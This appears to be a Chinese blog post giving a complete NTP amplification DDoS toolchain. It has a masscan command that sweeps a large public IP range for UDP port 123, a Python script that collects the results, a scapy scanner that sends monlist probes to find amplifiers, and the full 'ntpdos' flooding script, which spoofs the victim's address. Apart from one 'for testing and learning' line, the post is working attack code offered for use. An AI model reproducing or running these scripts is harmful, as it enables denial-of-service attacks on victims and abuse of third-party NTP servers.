NTP放大攻击其实就是DDoS的一种。通过NTP服务器,可以把很小的请求变成很大的响应,这些响应可以直接指向到受害者的电脑。下面是python实现脚本,脚本只供测试和学习。

masscan是一个快速的端口扫描器

1.安装masscan

https://github.com/robertdavidgraham/masscan

2.扫描IP段端口,生成文件

./masscan -pU:123 -oX ntp.xml --rate 160000 101.0.0.0-120.0.0.0

3.去掉重复,生成新文件

from lxml import etree
port = None
address = None
parsedServers = []
#Opens the file used to store single enteries.
outputFile = open('port123.txt', 'a')
for event, element in etree.iterparse('ntp.xml', tag="host"):
for child in element:
if child.tag == 'address':
address = child.attrib['addr']
if child.tag == 'ports':
for a in child:
port = a.attrib['portid']
if port > 1 and address > 1:
if address not in parsedServers:
print address
outputFile.write(address + '\n')
parsedServers.append(address)
port = None
address = None
element.clear()
outputFile.close()
print 'End'

4.完整攻击代码

from scapy.all import *
import thread
rawData = "\x17\x00\x03\x2a" + "\x00" * 61
logfile = open('port123.txt', 'r')
outputFile = open('monlistServers.txt', 'a')
def sniffer():
sniffedPacket = sniff(filter="udp port 48769 and dst net 99.99.99.99", store=0, prn=analyser)

def analyser(packet):
if len(packet) > 200:
if packet.haslayer(IP):
print packet.getlayer(IP).src
outputFile.write(packet.getlayer(IP).src + '\n')

thread.start_new_thread(sniffer, ())

for address in logfile:
send(IP(dst=address)/UDP(sport=48769, dport=123)/Raw(load=rawData))
print 'End'

https://github.com/vpnguy/ntpdos

#!/usr/bin/env python
from scapy.all import *
import sys
import threading
import time
#NTP Amp DOS attack
#by DaRkReD
#usage ntpdos.py ex: ntpdos.py 1.2.3.4 file.txt 10
#FOR USE ON YOUR OWN NETWORK ONLY

#packet sender
def deny():
#Import globals to function
global ntplist
global currentserver
global data
global target
ntpserver = ntplist[currentserver] #Get new server
currentserver = currentserver + 1 #Increment for next
packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT
send(packet,loop=1) #SEND IT

#So I dont have to have the same stuff twice
def printhelp():
print "NTP Amplification DOS Attack"
print "By DaRkReD"
print "Usage ntpdos.py "
print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
print "NTP serverlist file should contain one IP per line"
print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
exit(0)

if len(sys.argv) < 4:
printhelp()
#Fetch Args
target = sys.argv[1]

#Help out idiots
if target in ("help","-h","h","?","--h","--help","/?"):
printhelp()

ntpserverfile = sys.argv[2]
numberthreads = int(sys.argv[3])
#System for accepting bulk input
ntplist = []
currentserver = 0
with open(ntpserverfile) as f:
ntplist = f.readlines()

#Make sure we dont out of bounds
if numberthreads > int(len(ntplist)):
print "Attack Aborted: More threads than servers"
print "Next time dont create more threads than servers"
exit(0)

#Magic Packet aka NTP v2 Monlist Packet
data = "\x17\x00\x03\x2a" + "\x00" * 4

#Hold our threads
threads = []
print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
print "Use CTRL+C to stop attack"

#Thread spawner
for n in range(numberthreads):
thread = threading.Thread(target=deny)
thread.daemon = True
thread.start()

threads.append(thread)

#In progress!
print "Sending..."

#Keep alive so ctrl+c still kills all them threads
while True:
time.sleep(1)

标签: none

评论已关闭